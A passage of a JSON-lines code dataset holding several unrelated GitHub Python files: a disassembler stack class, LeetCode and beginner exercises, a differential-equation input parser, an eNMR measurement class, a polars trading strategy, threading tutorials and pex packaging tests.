take\n        if width:\n            print(\"EMPTY POP\", width, self.render())\n            self.mangled = True\n\n    def find(self, offset, width):\n        ''' Find item on stack, rearrange if necessary '''\n        if self.mangled:\n            return 0, None\n        ptr = len(self.items) - 1\n        #print(\"A\", offset, width, ptr, self.render())\n        while offset > 0 and ptr >= 0:\n            sitem = self.items[ptr]\n            if sitem.width <= offset:\n                ptr -= 1\n                offset -= sitem.width\n                continue\n            break\n        #print(\"B\", offset, width, ptr, self.render())\n        if ptr < 0:\n            return 0, None\n        sitem = self.items[ptr]\n        if offset and sitem.width > offset:\n            nitem = StackItem(offset, None)\n            nitem.stack = self\n            self.items.insert(ptr + 1, nitem)\n            sitem.width -= offset\n            offset = 0\n        #print(\"C\", offset, width, ptr, self.render())\n        if sitem.width == width:\n            return ptr, sitem\n        while sitem.width < width:\n            pitem = self.items[ptr - 1]\n            sitem = StackItem(sitem.width + pitem.width, None)\n            sitem.stack = self\n            ptr -= 1\n            self.items[ptr] = sitem\n            self.items.pop(ptr + 1)\n            #print(\"D\", offset, width, ptr, self.render())\n            if sitem.width == width:\n                return ptr, sitem\n        nitem = StackItem(width, None)\n        nitem.stack = self\n        sitem.width -= width\n        self.items.insert(ptr + 1, nitem)\n        #print(\"E\", offset, width, ptr, self.render())\n        return ptr + 1, nitem\n\n    def get(self, offset, width):\n        ''' Get width item at offset '''\n        _ptr, item = self.find(offset, width)\n        return item\n\n    def put(self, offset, item):\n        ''' Put item at offset '''\n        ptr, sitem = self.find(offset, item.width)\n        if sitem is not None:\n            self.items[ptr] = item\n        elif not self.mangled:\n            print(\"BAD PUT\", offset, item, self.render())\n            self.mangled = True\n\n    def render(self):\n        ''' Render stack image '''\n        if self.mangled:\n            return \"{MANGLED}\"\n        return \"{\" + \"|\".join(str(x) for x in self.items) + \"}\"\n\n    def getbytes(self, offset, width):\n        ''' Get bytes from stack '''\n        idx = len(self.items) - 1\n        while self.items[idx].width <= offset:\n            #print(\"**\", offset, idx, width, self.items[idx], self.items[idx].width)\n            offset -= self.items[idx].width\n            idx -= 1\n        #print(\"**\", offset, idx, self.items[idx])\n        if offset and self.items[idx].width > offset:\n            return None\n        assert offset == 0\n        retval = bytearray()\n        item = self.items[idx]\n        ptr = 0\n        for n in range(width):\n            #print(\"##\", n, width, item, ptr, retval)\n            if ptr >= item.width:\n                idx -= 1\n                item = self.items[idx]\n                ptr = 0\n            if not item.blob:\n                return None\n            retval.append(item.blob[ptr])\n            ptr += 1\n        return retval\n","repo_name":"Datamuseum-DK/R1000.Disassembly","sub_path":"DFS/omsi/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8519344220","text":"# You are playing the guessing game Bulls and Cows with your friend: you write down a number and ask your friend to guess it. Each time your friend guesses, you give a hint telling them how many digits are correct in both value and position (called \"Bulls\") and how many digits are correct but in the wrong position (called \"Cows\"). Your friend keeps guessing based on the hints until the secret number is found.\n#\n# Write a function that, given the secret number and your friend's guess, returns the hint, using A for bulls and B for cows.\n#\n# Note that both the secret number and the guess may contain duplicate digits.\n#\n# Example 1:\n#\n# Input: secret = \"1807\", guess = \"7810\"\n#\n# Output: \"1A3B\"\n#\n# Explanation: 1 bull and 3 cows. The bull is 8; the cows are 0, 1 and 7.\n#\n# Example 2:\n#\n# Input: secret = \"1123\", guess = \"0111\"\n#\n# Output: \"1A1B\"\n#\n# Explanation: The first 1 in the guess is a bull; the second or third 1 may be counted as a cow.\nclass Solution(object):\n    def getHint(self, secret, guess):\n        \"\"\"\n        :type secret: str\n        :type guess: str\n        :rtype: str\n        \"\"\"\n\n        guess = list(guess)\n        secret = list(secret)\n        for i in range(len(guess)):\n            if guess[i] == secret[i]:\n                secret[i] = \"A\"\n                guess[i] = \"A\"\n        A = {}\n        B = {}\n        for i in 
range(len(guess)):\n A[guess[i]] = A.get(guess[i], 0)+1\n for i in range(len(guess)):\n B[secret[i]] = B.get(secret[i], 0)+1\n\n b = 0\n for key in A.keys():\n if key in B:\n b = b+min(A[key],B[key])\n return str(secret.count(\"A\")) +\"A\"+str(b-A.get(\"A\", 0))+\"B\"\n\ns = Solution()\nprint(s.getHint(secret = \"1\", guess = \"0\"))\n\n\n","repo_name":"heshibo1994/leetcode-python-2","sub_path":"299猜数字游戏.py","file_name":"299猜数字游戏.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9728130547","text":"nome = ''\r\npeso = ''\r\ncadastro = list()\r\nresposta = ''\r\ntot_pessoas = 0\r\nmaior = 0\r\nmenor = 0\r\n\r\nwhile resposta != 'n':\r\n nome = str(input('Informe o nome: '))\r\n peso = float(input('Informe o peso: '))\r\n cadastro.append(nome)\r\n cadastro.append(peso)\r\n resposta = str(input('Deseja continuar [S/N]? ')).strip().lower()[0]\r\n tot_pessoas = tot_pessoas + 1\r\n\r\nprint(f'Ao todo foram cadastradas {tot_pessoas} pessoas.') \r\n\r\nfor i in range(1, len(cadastro), 2):\r\n if i == 1:\r\n menor = cadastro[i]\r\n \r\n if cadastro[i] > maior:\r\n maior = cadastro[i]\r\n\r\n if cadastro[i] < menor:\r\n menor = cadastro[i]\r\n\r\nprint(f'O maior peso foi {maior:.1f} e pertence a ', end=' ')\r\nfor c in range(1, len(cadastro), 2):\r\n if cadastro[c] == maior:\r\n print(cadastro[c - 1], end= \", \")\r\n\r\nprint(f'\\nO menor peso foi {menor} e pertence a ', end=' ')\r\nfor d in range(1, len(cadastro), 2):\r\n if cadastro[d] == menor:\r\n print(cadastro[d - 1], end=', ')\r\n","repo_name":"joaobosco2011/Python-Learning","sub_path":"ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15018489130","text":"import random\r\nimport math\r\n\r\n\r\ndef zerodiv(fun):\r\n count = 0\r\n for j in range(30):\r\n x, y, z, u, v = [random.randint(-100001, 100001)] * 5\r\n try:\r\n eval(fun)\r\n except ZeroDivisionError:\r\n count += 1\r\n except ValueError:\r\n continue\r\n if count == 20:\r\n return True\r\n return False\r\n\r\n\r\ndef valuer(fun):\r\n count = 0\r\n for j in range(30):\r\n x, y, z, u, v = [random.randint(-100001, 100001)] * 5\r\n try:\r\n eval(fun)\r\n except ValueError:\r\n count += 1\r\n except ZeroDivisionError:\r\n continue\r\n if count == 20:\r\n return True\r\n return False\r\n\r\n\r\ndef diff_input():\r\n \"\"\"\r\n Ввод для дифференциального уравнение I порядка вида: y'=f(x,y) или систем таких уравнений\r\n Либо для ДУ II порядка вида: y'=f(x,y,y')\r\n Начальное условие вида: y(m) = ... | x ∈ [m, ...]\r\n Точность задаётся целым числом\r\n :return: [f(x,y,...),...] | [y(0), z[0],...] 
| x∈[a, b] | точность(n)\r\n \"\"\"\r\n\r\n flag = False\r\n while not flag:\r\n system = None\r\n print('Введите кол-во уравнений в системе (от 1 до 4): ')\r\n while system is None:\r\n try:\r\n count = int(input('Количество уравнений: '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n system = count\r\n\r\n mode = None\r\n if system == 1:\r\n print('Для систем из 1 уравнения предусмотрена возможность ввести ДУ 1-ого/2-ого порядка на выбор')\r\n while mode is None:\r\n try:\r\n digit = int(input('Порядок уравнения: '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n mode = digit\r\n\r\n if mode == 2:\r\n fun = input('Введите функцию: ')\r\n fun = fun.lower()\r\n fun = fun.replace(\"y\\'\", \"z\")\r\n\r\n func1, func2, func3, func4 = [None] * 4\r\n y0, z0, u0, v0 = [None] * 4\r\n if mode == 2:\r\n for_func = ['z', fun]\r\n else:\r\n for_func = [func1, func2, func3, func4]\r\n\r\n for_yzuv = [y0, z0, u0, v0]\r\n a, b, n = [None] * 3\r\n\r\n # 1-ый блок, вводим функцию\r\n func_string = ['y', 'z', 'u', 'v']\r\n string = ', '.join(func_string[0:system])\r\n answer_func = []\r\n if mode == 2:\r\n system = mode\r\n\r\n for i in range(0, system):\r\n func = for_func[i]\r\n c = 0\r\n while func is None or (mode == 2 and c == 0):\r\n if mode != 2:\r\n fun = input(f'Введите функцию d{func_string[i]}/dx = f(x, {string}): ')\r\n else:\r\n fun = func\r\n\r\n if '^' in fun:\r\n fun = fun.replace('^', '**')\r\n fun = fun.lower()\r\n\r\n plan = ['e', 'pi', 'sin', 'cos', 'tan', 'log']\r\n dict_replace = {i: 'math.' + i for i in plan}\r\n dict_replace['tg'] = 'math.tan'\r\n dict_replace['ln'] = 'math.log'\r\n dict_replace['ctan'] = '1/math.tan'\r\n dict_replace['ctg'] = '1/math.tan'\r\n\r\n for item in dict_replace:\r\n if item in fun:\r\n fun = fun.replace(item, dict_replace[item])\r\n\r\n # проверяем есть ли лишние буквы\r\n alphabet0 = ['z', 'u', 'v', 'j', 'k', 'q', 'r', 'b', 'd', 'w', 'f', 'f']\r\n for j in range(0, system-1):\r\n alphabet0[j] = 'j'\r\n alphabet1 = ['t', 'a', 'p', 'i', 's', 'n', 'c', 'o', 'l', 'g', 'h', 'm']\r\n alphabet2 = {\r\n 't': ['math', 'tan'], 'a': ['math', 'tan'], 'p': ['pi'], 'i': ['sin', 'pi'],\r\n 's': ['sin', 'cos'], 'n': ['tan', 'sin'], 'c': ['cos'], 'o': ['cos', 'log'],\r\n 'l': ['log'], 'g': ['log'], 'h': ['math'], 'm': ['math']\r\n }\r\n\r\n for letter in range(len(alphabet0)):\r\n if alphabet0[letter] in fun:\r\n print('У вас есть лишние переменные/символы букв')\r\n break\r\n let = alphabet1[letter]\r\n if fun.count(let) > sum(list(map(lambda x: fun.count(x), alphabet2[let]))):\r\n print('У вас есть лишние переменные/символы букв')\r\n break\r\n else: # сюда заходим, если for закончился без break\r\n x, y, z, u, v = [1] * 5 # проверяем ошибки при вызове eval()\r\n flag_2 = False\r\n try:\r\n eval(fun)\r\n except (SyntaxError, NameError, AttributeError):\r\n print('Синтаксическая ошибка!')\r\n flag_2 = True\r\n except ValueError:\r\n if valuer(fun):\r\n print('Скорее всего в вашей формуле статическая ошибка в логарифме, исправьте её')\r\n flag_2 = True\r\n except ZeroDivisionError:\r\n if zerodiv(fun):\r\n print('Скорее всего в вашей формуле статическое деление на ноль')\r\n flag_2 = True\r\n except TypeError:\r\n print('Неправильное использование мат. функций (проверьте ваши логарифмы и триг. 
ф-ции)')\r\n flag_2 = True\r\n\r\n if flag_2:\r\n func = None\r\n if not flag_2:\r\n answer_func.append(fun)\r\n func = fun\r\n c = 1\r\n\r\n if mode == 2:\r\n print('Ваше уравнение было превращено в систему: ')\r\n print(\"{\" + f'y\\' = {answer_func[0]}')\r\n print(\"{\" + f'z\\' = {answer_func[1]}')\r\n\r\n # 2-ой блок, здесь будет ввод начальных условий\r\n while a is None or b is None:\r\n try:\r\n aa, bb = map(float, input('\\nВведите 2 числа через пробел - начало и конец отрезка.'\r\n '\\nКонцы включены. Разделитель целой и дробной части - точка').split())\r\n except ValueError:\r\n print('Введите значения в правильном формате!')\r\n continue\r\n\r\n a, b = aa, bb\r\n\r\n answer_yzuv = []\r\n for i in range(0, system):\r\n yzuv = for_yzuv[i]\r\n while yzuv is None:\r\n try:\r\n some_func = float(input(f'\\nВведите {func_string[i]}({a}): '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n yzuv = some_func\r\n answer_yzuv.append(yzuv)\r\n\r\n # 3-ий блок, здесь будет ввод точности\r\n while n is None:\r\n try:\r\n s = int(input('\\nВведите число n в ряде x0, x1, ..., xn: '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n if s <= 0:\r\n print('Количество не может быть <= 0')\r\n continue\r\n else:\r\n n = s\r\n\r\n print('\\nЕсли вы согласны с введёнными значениями и хотите завершить ввод, впишите любой символ/слово')\r\n print('В противном случае, напишите \"NO\" и вы начнёте с первого шага')\r\n check_input = input()\r\n if check_input != 'NO':\r\n return answer_func, answer_yzuv, [a, b], n\r\n elif check_input.lower() == 'no':\r\n continue\r\n\r\n\r\nif __name__ == '__main__':\r\n print(diff_input())\r\n","repo_name":"SMALA-comand/Differential_equations","sub_path":"differential_input.py","file_name":"differential_input.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"35498077685","text":"## coding: utf-8\n# This is the eNMR class. THE library for the evaluation of bruker-eNMR-spectra based on the VC-PowerSource of the\n# Schönhoff working group.\n# It works with the volt-increment method which calculates the respective voltage with the VC-list\n# Further Implementation can be asked for at f_schm52@wwu.de\nfrom .eNMR_Methods import _eNMR_Methods\nimport matplotlib.pyplot as plt\nfrom .base import Measurement\nfrom re import findall\nimport numpy as np\nimport pandas as pd\n \n\n#class eNMR_Emma(eNMR_Measurement):\nclass eNMR_Emma(_eNMR_Methods):\n #'''\n #This is the subsubclass of Masurement() and subclass of eNMR_Methods specialised to process data obtained from the experimental Schönhoff set-up\n \n #path:\n #relative or absolute path to the measurements folder\n #measurement:\n #the to the experiment corresponding EXPNO\n #alias:\n #Here you can place an individual name relevant for plotting. If None, the path is taken instead. \n #Uink:\n #voltage increment. Usually extracted from the title file if defined with e.g. 
\"Uink = 10V\"\n #If Uink cannot be found or is wrong it can be entered manually during the data import.\n #The voltage list is calculated from the voltage increment and the vc list when the incrementation loop is used in the pulse program\n #dependency:\n #'U': voltage dependent eNMR measurement\n #'G': fieldgradient dependent eNMR measurement\n\n #linebroadening:\n #setting a standard-value for the linebroadening.\n #'''\n def __init__(self, path, expno, Uink=None, dependency=\"U\", alias=None, lineb=0.5, electrode_distance=2.2e-2):\n Measurement.__init__(self, path, expno, lineb=lineb, alias=alias)\n self.dependency = dependency.upper()\n \n self._x_axis = {\"U\": \"U / [V]\",\n \"G\": \"g in T/m\",\n \"I\": \"I / mA\",\n 'RI': 'RI / V'\n }[self.dependency.upper()]\n \n #self._x_axis = {\"G\": \"g in T/m\",\n #\"U\": \"U / [V]\"}[self.dependency.upper()]\n \n self.difflist = pd.read_csv(self.dateipfad+\"/difflist\",\n names=[\"g in T/m\"])*0.01\n \n self.vcList = pd.DataFrame()\n \n if self.dic['acqus']['PULPROG'][-3:] == 'var':\n polarity = 1\n print('this is a regular measurement! (non-_pol)')\n elif self.dic['acqus']['PULPROG'][-3:] == 'pol':\n polarity = -1\n print('this is a _pol-Measurement!')\n else:\n print(\"no var or pol PULPROG\")\n \n if dependency.upper() == \"U\":\n try:\n # takes the title page to extract the volt increment\n title = open(self.dateipfad+\"/pdata/1/title\").read()\n # gets the voltage increment using a regular expression\n #uimport = findall('[U|u]in[k|c]\\s*=?\\s*\\d+', title)[0]\n uimport = findall('[U|u]in[k|c]\\s*=+\\s*\\d+', title)[0]\n self.uInk = int(findall('\\d+', uimport)[0])\n except ValueError:\n print('no volt increment found\\nyou may want to put it in manually')\n self.uInk = Uink\n except IndexError:\n print('No Uink found! May not be an eNMR experiment.')\n self.uInk = Uink\n \n self.vcList[\"U / [V]\"] = [i*self.uInk*polarity for i in range(len(self.difflist))]\n \n elif dependency.upper() == \"G\":\n try:\n # takes the title page to extract the volt increment\n title = open(self.dateipfad+\"/pdata/1/title\").read()\n # gets the voltage increment using a regular expression\n uimport = findall('[U|u]\\s*=?\\s*\\d+', title)[0]\n self.uInk = int(findall('\\d+', uimport)[0])\n\n except ValueError:\n print('no volt increment found\\nyou may want to put it in manually')\n self.uInk = Uink\n except IndexError:\n print('No Uink found! 
May not be an eNMR experiment.')\n self.uInk = Uink # Uinktext\n \n #if Uink is not None:\n #self.uInk = Uink\n \n self.vcList[\"U / [V]\"] = [self.uInk*polarity for i in range(len(self.difflist))]\n #self.vcList[\"U / [V]\"] = [self.vcList[\"vc\"][n]/2*self.uInk if self.vcList[\"vc\"][n] % 2 == 0\n #else (self.vcList[\"vc\"][n]+1)/2*self.uInk*-1\n #for n in range(len(self.data[:, 0]))]\n\n #if self.dependency.upper() == \"U\":\n #try:\n #self.vcList = pd.read_csv(self.dateipfad+\"/vclist\",\n #names=[\"vc\"]).loc[:len(self.data[:, 0])-1]\n \n #except:\n #print(\"There is a Problem with the VC-list or you performed a gradient dependent measurement\")\n #elif self.dependency.upper() == \"G\":\n #self.vcList = pd.DataFrame(np.ones((len(self.data[:, 0]), 1)),\n #columns=[\"vc\"])\n #else:\n #print(\"The dependency is not properly selected, try again!\")\n\n #self.difflist = pd.read_csv(self.dateipfad+\"/difflist\",\n #names=[\"g in T/m\"])*0.01\n \n #if Uink is not None:\n #self.uInk = Uink\n \n #self.vcList[\"U / [V]\"] = [self.vcList[\"vc\"][n]/2*self.uInk if self.vcList[\"vc\"][n] % 2 == 0\n #else (self.vcList[\"vc\"][n]+1)/2*self.uInk*-1\n #for n in range(len(self.data[:, 0]))]\n \n # try to open phase data, otherwise create new\n try:\n self.eNMRraw = pd.read_csv(self.path+\"phase_data_\"+self.expno+\".csv\",\n index_col=0, sep=\" \")\n # --> update voltage list\n self.eNMRraw[\"U / [V]\"] = self.vcList[\"U / [V]\"]\n except:\n print(\"eNMRraw was missing and is generated\")\n self.vcList[\"ph0\"] = np.zeros(len(self.data.real[:, 0]))\n self.eNMRraw = self.vcList\n finally:\n self.eNMRraw[\"g in T/m\"] = self.difflist\n \n self.p1 = self.dic[\"acqus\"][\"P\"][1]\n self.d1 = self.dic[\"acqus\"][\"D\"][1]\n \n try:\n # import of diffusion parameters for newer Spectrometers\n import xml.etree.ElementTree as etree\n diffpar = etree.parse(self.dateipfad+'/diff.xml')\n root = diffpar.getroot()\n self.Delta = float(root.findall('DELTA')[0].text)*1e-3\n self.delta = float(root.findall('delta')[0].text)*1e-3 # it should be read as in microseconds at this point due to bruker syntax\n print('The diffusion parameters were read from the respectie .XML!')\n except:\n # determination of the diffusion parameters for Emma\n self._d2 = self.dic[\"acqus\"][\"D\"][2]\n self._d5 = self.dic[\"acqus\"][\"D\"][5]\n self._d9 = self.dic[\"acqus\"][\"D\"][9]\n self._d11 = self.dic[\"acqus\"][\"D\"][11]\n self._p19, self._p18, self._p17 = self.dic[\"acqus\"][\"P\"][19],\\\n self.dic[\"acqus\"][\"P\"][18],\\\n self.dic[\"acqus\"][\"P\"][17]\n print('That did not work. 
Your data is from an old spectrometer!')\n # calculating usable parameters\n self.delta = self._p17+self._p18\n self._Delta_1 = 0.001*(self._p17*2+self._p18)+(self._d2+self._d9+self._d5+self._d11)*1000+0.001*self.p1+self._d11\n self._Delta_2 = 0.001*(self._p17*2+self._p18)+(self._d2+self._d9+self._d5+self._d11)*1000+0.001*self.p1*2\n self._spoiler = (self._d11+self._p17+self._p19+self._p17)*0.001+self._d2*1000\n self.Delta = self._Delta_1+self._Delta_2+2*self._spoiler\n self.Delta *=1e-3\n self.delta *=1e-6\n \n\n # Elektrodenabstand in m\n self.d = electrode_distance\n self.g = self.eNMRraw[\"g in T/m\"][0]\n \n def __add__(self, other):\n \n for obj in [self, other]:\n for k in obj.eNMRraw.columns:\n if k[:2] == 'ph':\n obj.eNMRraw[k] -= obj.eNMRraw.loc[0, k]\n print('%s normalized to 0V'%k)\n else:\n pass\n self.eNMRraw = self.eNMRraw.append(other.eNMRraw)\n self.eNMRraw.sort_values('U / [V]', inplace=True)\n return self\n","repo_name":"Flackermann/eNMRpy","sub_path":"eNMRpy/Measurement/Emma.py","file_name":"Emma.py","file_ext":"py","file_size_in_byte":8656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29478718489","text":"des = \"\"\"\nThe Fibonacci numbers, commonly denoted F(n) form a sequence, called the\nFibonacci sequence, such that each number is the sum of the two preceding ones,\n starting from 0 and 1. That is,\nF(0) = 0, F(1) = 1\nF(n) = F(n - 1) + F(n - 2), for n > 1.\nGiven n, calculate F(n).\nInput: n = 2\nOutput: 1\nExplanation: F(2) = F(1) + F(0) = 1 + 0 = 1.\nInput: n = 3\nOutput: 2\nExplanation: F(3) = F(2) + F(1) = 1 + 1 = 2.\nInput: n = 4\nOutput: 3\nExplanation: F(4) = F(3) + F(2) = 2 + 1 = 3.\nConstraints:\n0 <= n <= 30\n\"\"\"\n\n\nclass Solution:\n def fib(self, n: int) -> int:\n return self.fib_with_memo(n, {})\n\n def fib_with_memo(self, n: int, memo: dict) -> int:\n if n == 0:\n return 0\n if n == 1:\n return 1\n\n if n in memo:\n return memo[n]\n\n result = self.fib_with_memo(n-1, memo) + self.fib_with_memo(n-2, memo)\n memo[n] = result\n\n return result\n\n\n# completed\n","repo_name":"Sic4Parvis9Magna/leetcode-practice","sub_path":"april_2021/fib_memo.py","file_name":"fib_memo.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13363770527","text":"#Python Object-Oriented Programming: Classes and Instances\n\nclass Employee:\n\n num_of_emps = 0\n raise_amount = 1.04\n\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' 
+ last + '@company.com'\n\n Employee.num_of_emps +=1\n\n @property\n def fullname(self):\n return '{} {}'.format(self.first, self.last)\n \n def apply_raise(self):\n self.pay = int(self.pay * self.raise_amount)\n\n\n\n \ndev_1 = Employee('Aerish', 'Aryal', 750000)\ndev_2 = Employee('Test', 'User', 500000)\n\n\n\n\nprint(dev_1.pay)\ndev_1.apply_raise()\nprint(dev_1.pay)\n\n\n\n\n\n","repo_name":"Aerish369/Hello-world","sub_path":"OOP in py/oop1.py","file_name":"oop1.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74005588625","text":"import polars as pl\r\nfrom mysystem.strategy import Strategy\r\nclass MyStrategy(Strategy):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n self.klines = pl.DataFrame()\r\n self.kline_num = 50\r\n self.signals = {}\r\n self.stk_num = 3577\r\n self.stk_pool = []\r\n self.trade_period = 1\r\n\r\n def on_init(self, stk_ids):\r\n self.stk_pool = stk_ids[2800:3000]\r\n self.stk_num = len(self.stk_pool)\r\n self.kline_num = 30*self.stk_num\r\n self.trade_period = 2\r\n\r\n def on_day(self, day_data, stk_hold):\r\n in_data = day_data.filter(pl.col('stk_id').is_in(self.stk_pool))\r\n if self.klines.shape[0]<self.kline_num:\r\n self.klines = self.klines.vstack(in_data)\r\n return [], []\r\n self.calculate_signal()\r\n self.klines = self.klines.vstack(in_data)\r\n self.klines = self.klines[self.stk_num:, :]\r\n return self.on_buy_in(), self.on_sold_out(stk_hold)\r\n \r\n def calculate_signal(self):\r\n gb = self.klines.group_by('stk_id', maintain_order=True)\r\n self.signals.clear()\r\n for stk_id,df in gb:\r\n df = df.with_columns(\r\n (pl.col('close')*pl.col('cumadj')/pl.col('cumadj').max()).alias('p')\r\n )\r\n \r\n df = df.with_columns(\r\n pl.col('p').rolling_mean(21).alias('ma5')\r\n )\r\n \r\n self.signals[stk_id] = df['ma5'].tail(1).to_list()[0] - df['p'].tail(1).to_list()[0]\r\n return\r\n \r\n \r\n def on_buy_in(self):\r\n t = sorted(self.signals.items(), key=lambda x:x[1], reverse=True)\r\n #print(t)\r\n return [(id, 0.04) for id,s in t[:5]]\r\n \r\n def on_sold_out(self, stk_hold):\r\n return [id for id,s in self.signals.items() if s<=0.005]\r\n \r\n def __name__(self):\r\n return '5DR' \r\n","repo_name":"leafDancer/backtest-sysetem","sub_path":"strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9198170956","text":"# Time Module\r\nimport datetime\r\nnow = datetime.datetime.now()\r\nprint(\"current date and time\")\r\nprint(now)\r\n# dictionary comprehension\r\n# dictionary = {key: expression for (key,value) in iterables}\r\n# dictionary = {key: expression for (key,value) in iterables if condition}\r\n# dictionary = {key: (if/else) for (key,value) in iterables if condition}\r\n# dictionary = {key: function_value for (key,value) in iterables if condition}\r\nimport time\r\n\r\n\r\n\r\ncities_F = {'lahore':90,'karachi':150,'peshawar': 130}\r\ncities_C = {key: round((value-32)*(5/9)) for (key,value) in cities_F.items()}\r\ncities_C = {key: round((value-32)*(5/9)) for (key,value) in cities_F.items() if value == 130}\r\ncities_C = {key: (\"Warm\" if value >= 100 else \"Moderate\") for (key,value) in cities_F.items()}\r\nprint(cities_C)\r\n# zip(* iterables)\r\n\r\nusername = [\"bro\",\"Sam\",\"code\"]\r\npasswords = (\"p@ssword\",\"abc123\",\"guest\")\r\n\r\nusers 
=dict(zip(username,passwords))\r\n\r\nprint(type(users))\r\n\r\nfor key,value in users.items():\r\n print(key+\" : \"+value)\r\nimport time\r\nprint(time.ctime(1000000))\r\n\r\nprint(time.time())\r\n\r\nprint(time.ctime(time.time()))\r\n\r\ntime_object = time.localtime()\r\nprint(time_object)\r\nlocal_time = time.strftime(\"%B %d %Y %H:%M:%S\", time_object)\r\nprint(local_time)\r\n\r\ntime_string = '''20 April, 2023'''\r\ntime_object = time.strptime(time_string,'''%d %B, %Y''')\r\nprint(time_object)\r\n\r\ntime_tuple = (2023, 6, 7, 4, 31, 0, 0, 0, 0)\r\ntime_string = time.asctime(time_tuple)\r\n# time_string = time.mktime(time_tuple) #for second\r\nprint(time_string)\r\n\r\nimport threading\r\nimport time\r\n\r\ndef eat_breakfast():\r\n time.sleep(3)\r\n print(\"you eat breakfast\")\r\n\r\ndef drink_coffee():\r\n time.sleep(4)\r\n print(\"you drink coffee\")\r\n\r\ndef study():\r\n time.sleep(5)\r\n print(\"You finish study \")\r\n\r\nx = threading.Thread(target =eat_breakfast, args=())\r\nx.start()\r\n\r\ny = threading.Thread(target=drink_coffee, args=())\r\ny.start()\r\n\r\nz = threading.Thread(target=study, args=())\r\nz.start()\r\n\r\nx.join()\r\ny.join()\r\nz.join()\r\n\r\n#\r\neat_breakfast()\r\ndrink_coffee()\r\nstudy()\r\n\r\nprint(threading.active_count())\r\nprint(threading.enumerate()) # enumerate function is used to print the list while running the thread\r\nprint(time.perf_counter())\r\nimport threading\r\nimport time\r\n\r\n\r\ndef timer():\r\n print()\r\n print()\r\n count = 0\r\n while True:\r\n time.sleep(1)\r\n count += 1\r\n print(\"logged in for: \",count, \"seconds\")\r\n\r\n\r\nx = threading.Thread(target=timer, daemon=True)\r\nx.start()\r\n\r\n\r\nanswer = input(\"Do you wish to exit?\")\r\n#__________________________\r\n # Python multiprocessing\r\n# *********************************\r\n# multiprocessing = running tasks in parallel on different cpu cores, bypasses GIL used for threading\r\n# multiprocessing = better for cpu bound tasks (heavy cpu usage)\r\n# multithreading = better for io bound tasks (waiting around)\r\n\r\nfrom multiprocessing import Process, cpu_count\r\nimport time\r\n\r\n\r\ndef counter(num):\r\n count = 0\r\n while count < num:\r\n count += 1\r\n\r\n\r\ndef main():\r\n\r\n print(\"cpu count:\", cpu_count())\r\n\r\n a = Process(target=counter, args=(100000000,))\r\n # b = Process(target=counter, args=(500000000,))\r\n\r\n a.start()\r\n # b.start()\r\n\r\n print(\"processing...\")\r\n\r\n a.join()\r\n # b.join()\r\n\r\n print(\"Done!\")\r\n print(\"finished in:\", time.perf_counter(), \"seconds\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"SaiemWaseem/demopygit","sub_path":"Time_Module.py","file_name":"Time_Module.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6054688071","text":"import os\nimport stat\nimport subprocess\nimport sys\nfrom textwrap import dedent\n\nfrom twitter.common.contextutil import pushd\n\nfrom pex.common import open_zip\nfrom pex.testing import temporary_content\n\n\ndef assert_entry_points(entry_points):\n setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='my_app',\n version='0.0.0',\n zip_safe=True,\n packages=[''],\n entry_points=%(entry_points)r,\n )\n \"\"\" % dict(entry_points=entry_points))\n\n my_app = dedent(\"\"\"\n def do_something():\n print(\"hello world!\")\n \"\"\")\n\n with temporary_content({'setup.py': setup_py, 'my_app.py': my_app}) as project_dir:\n with 
pushd(project_dir):\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_pex'])\n process = subprocess.Popen([os.path.join(project_dir, 'dist', 'my_app-0.0.0.pex')],\n stdout=subprocess.PIPE)\n stdout, _ = process.communicate()\n assert '{pex_root}' not in os.listdir(project_dir)\n assert 0 == process.returncode\n assert stdout == b'hello world!\\n'\n\n\ndef assert_pex_args_shebang(shebang):\n setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='my_app',\n version='0.0.0',\n zip_safe=True,\n packages=[''],\n )\n \"\"\")\n\n with temporary_content({'setup.py': setup_py}) as project_dir:\n with pushd(project_dir):\n assert subprocess.check_call(\n [sys.executable, 'setup.py', 'bdist_pex',\n '--pex-args=--python-shebang=\"%(shebang)s\"' %\n dict(shebang=shebang)]) == 0\n\n with open(os.path.join(project_dir, 'dist',\n 'my_app-0.0.0.pex'), 'rb') as fp:\n assert fp.readline().decode().rstrip() == shebang\n\n\ndef test_entry_points_dict():\n assert_entry_points({'console_scripts': ['my_app = my_app:do_something']})\n\n\ndef test_entry_points_ini_string():\n assert_entry_points(dedent(\"\"\"\n [console_scripts]\n my_app=my_app:do_something\n \"\"\"))\n\n\ndef test_pex_args_shebang_with_spaces():\n assert_pex_args_shebang('#!/usr/bin/env python')\n\n\ndef test_pex_args_shebang_without_spaces():\n 